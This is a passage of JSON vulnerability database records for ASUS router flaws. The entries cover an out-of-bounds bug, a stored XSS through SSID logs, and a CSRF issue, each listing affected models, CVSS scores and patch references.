"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-02713"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016158"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1254"
},
{
"db": "NVD",
"id": "CVE-2018-8879"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-11-21T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-02713"
},
{
"date": "2019-12-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-016158"
},
{
"date": "2019-11-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201911-1254"
},
{
"date": "2019-11-21T16:15:11.720000",
"db": "NVD",
"id": "CVE-2018-8879"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-02-18T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-02713"
},
{
"date": "2019-12-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-016158"
},
{
"date": "2020-07-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201911-1254"
},
{
"date": "2024-11-21T04:14:30.903000",
"db": "NVD",
"id": "CVE-2018-8879"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201911-1254"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Asuswrt-Merlin Firmware out-of-bounds vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-016158"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201911-1254"
}
],
"trust": 0.6
}
}
VAR-202207-0160
Vulnerability from variot - Updated: 2024-08-14 15:27ASUS RT-A88U 3.0.0.4.386_45898 is vulnerable to Cross Site Scripting (XSS). The ASUS router admin panel does not sanitize the WiFI logs correctly, if an attacker was able to change the SSID of the router with a custom payload, they could achieve stored XSS on the device. ASUS RT-A88U is a wireless router from ASUS (ASUS) in Taiwan
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202207-0160",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "zenwifi xd4s",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "zenwifi ac mini",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac58u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ax86u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac87u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-acrh13",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-n12vp b1",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac66r",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac2400",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "zenwifi pro et12",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac5300",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-n12e c1",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac55u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac68uf",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "zenwifi xd6",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac1300g\\+",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac2200",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac66u\\+",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac56s",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ax82u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac1300uhp",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-n12hp b1",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac85u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac1200g",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "tuf gaming ax3000 v2",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac55uhp",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac1750 b1",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-n14uhp",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac68u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac3100",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "zenwifi pro xt12",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac51u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "zenwifi et8",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ax92u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac66w",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac66u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ax68u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ax58u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ax55",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac3200",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "zenwifi xt9",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rog rapture gt-ac5300",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac1750",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac68r",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ax3000",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rog rapture gt-ax11000",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac56u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ax89x",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "zenwifi xd5",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "zenwifi ax hybrid",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac52u b1",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac1900",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-n12\\+ b1",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac1200g\\+",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-n66w",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "zenwifi ax mini",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac1200e",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac2900",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac53",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac85p",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-n19",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac68w",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac1200gu",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ax56u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac51u\\+",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ax88u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-n12d1",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-n66u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac65p",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac1900u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "zenwifi ax",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "4g-ac68u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "zenwifi ac",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac57u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-n18u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac68p",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac86u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac65u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac66u b1",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "4g-ac53u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac2600",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac87r",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-acrh17",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "tuf gaming ax5400",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-n66r",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-n12e b1",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rog rapture gt-ac2900",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac1200hp",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac1900p",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac56r",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac88u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-ac1200",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-n66c1",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.386.46061"
},
{
"model": "rt-a88u 3.0.0.4.386 45898",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-58229"
},
{
"db": "NVD",
"id": "CVE-2021-43702"
}
]
},
"cve": "CVE-2021-43702",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.8,
"id": "CVE-2021-43702",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "LOW",
"trust": 1.1,
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2022-58229",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.0,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.3,
"id": "CVE-2021-43702",
"impactScore": 6.0,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-43702",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2022-58229",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202207-389",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULMON",
"id": "CVE-2021-43702",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-58229"
},
{
"db": "VULMON",
"id": "CVE-2021-43702"
},
{
"db": "CNNVD",
"id": "CNNVD-202207-389"
},
{
"db": "NVD",
"id": "CVE-2021-43702"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ASUS RT-A88U 3.0.0.4.386_45898 is vulnerable to Cross Site Scripting (XSS). The ASUS router admin panel does not sanitize the WiFI logs correctly, if an attacker was able to change the SSID of the router with a custom payload, they could achieve stored XSS on the device. ASUS RT-A88U is a wireless router from ASUS (ASUS) in Taiwan",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-43702"
},
{
"db": "CNVD",
"id": "CNVD-2022-58229"
},
{
"db": "VULMON",
"id": "CVE-2021-43702"
}
],
"trust": 1.53
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-43702",
"trust": 2.3
},
{
"db": "CNVD",
"id": "CNVD-2022-58229",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202207-389",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2021-43702",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-58229"
},
{
"db": "VULMON",
"id": "CVE-2021-43702"
},
{
"db": "CNNVD",
"id": "CNNVD-202207-389"
},
{
"db": "NVD",
"id": "CVE-2021-43702"
}
]
},
"id": "VAR-202207-0160",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-58229"
}
],
"trust": 1.2372652696875
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-58229"
}
]
},
"last_update_date": "2024-08-14T15:27:14.485000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for ASUS RT-A88U Cross-Site Scripting Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/345646"
},
{
"title": "ASUS RT-A88U Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=200692"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-58229"
},
{
"db": "CNNVD",
"id": "CNNVD-202207-389"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-43702"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.3,
"url": "https://www.kroll.com/en/insights/publications/cyber/cve-2021-43702-from-discovery-to-patch"
},
{
"trust": 1.7,
"url": "https://www.asus.com/uk/networking-iot-servers/wifi-routers/asus-wifi-routers/rt-ac88u/"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2021-43702/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/79.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-58229"
},
{
"db": "VULMON",
"id": "CVE-2021-43702"
},
{
"db": "CNNVD",
"id": "CNNVD-202207-389"
},
{
"db": "NVD",
"id": "CVE-2021-43702"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2022-58229"
},
{
"db": "VULMON",
"id": "CVE-2021-43702"
},
{
"db": "CNNVD",
"id": "CNNVD-202207-389"
},
{
"db": "NVD",
"id": "CVE-2021-43702"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-08-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2022-58229"
},
{
"date": "2022-07-05T00:00:00",
"db": "VULMON",
"id": "CVE-2021-43702"
},
{
"date": "2022-07-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202207-389"
},
{
"date": "2022-07-05T12:15:07.830000",
"db": "NVD",
"id": "CVE-2021-43702"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-08-19T00:00:00",
"db": "CNVD",
"id": "CNVD-2022-58229"
},
{
"date": "2022-07-18T00:00:00",
"db": "VULMON",
"id": "CVE-2021-43702"
},
{
"date": "2022-07-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202207-389"
},
{
"date": "2022-07-18T15:27:57.557000",
"db": "NVD",
"id": "CVE-2021-43702"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202207-389"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ASUS RT-A88U Cross-Site Scripting Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-58229"
},
{
"db": "CNNVD",
"id": "CNNVD-202207-389"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202207-389"
}
],
"trust": 0.6
}
}
VAR-202001-0883
Vulnerability from variot - Updated: 2024-08-14 14:45ASUS RT-N56U devices allow CSRF. ASUS RT-N56U The device contains a cross-site request forgery vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202001-0883",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rt-ac66u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.374_2050"
},
{
"model": "rt-n15u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.374_16"
},
{
"model": "dsl-n55u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.374_1397"
},
{
"model": "rt-n16",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.374_979"
},
{
"model": "rt-n53",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.374_311"
},
{
"model": "rt-n56u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.374_979"
},
{
"model": "rt-n10u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.374_168"
},
{
"model": "dsl-n55u",
"scope": null,
"trust": 0.8,
"vendor": "asustek computer",
"version": null
},
{
"model": "rt-ac66u",
"scope": null,
"trust": 0.8,
"vendor": "asustek computer",
"version": null
},
{
"model": "rt-n10u",
"scope": null,
"trust": 0.8,
"vendor": "asustek computer",
"version": null
},
{
"model": "rt-n15u",
"scope": null,
"trust": 0.8,
"vendor": "asustek computer",
"version": null
},
{
"model": "rt-n16",
"scope": null,
"trust": 0.8,
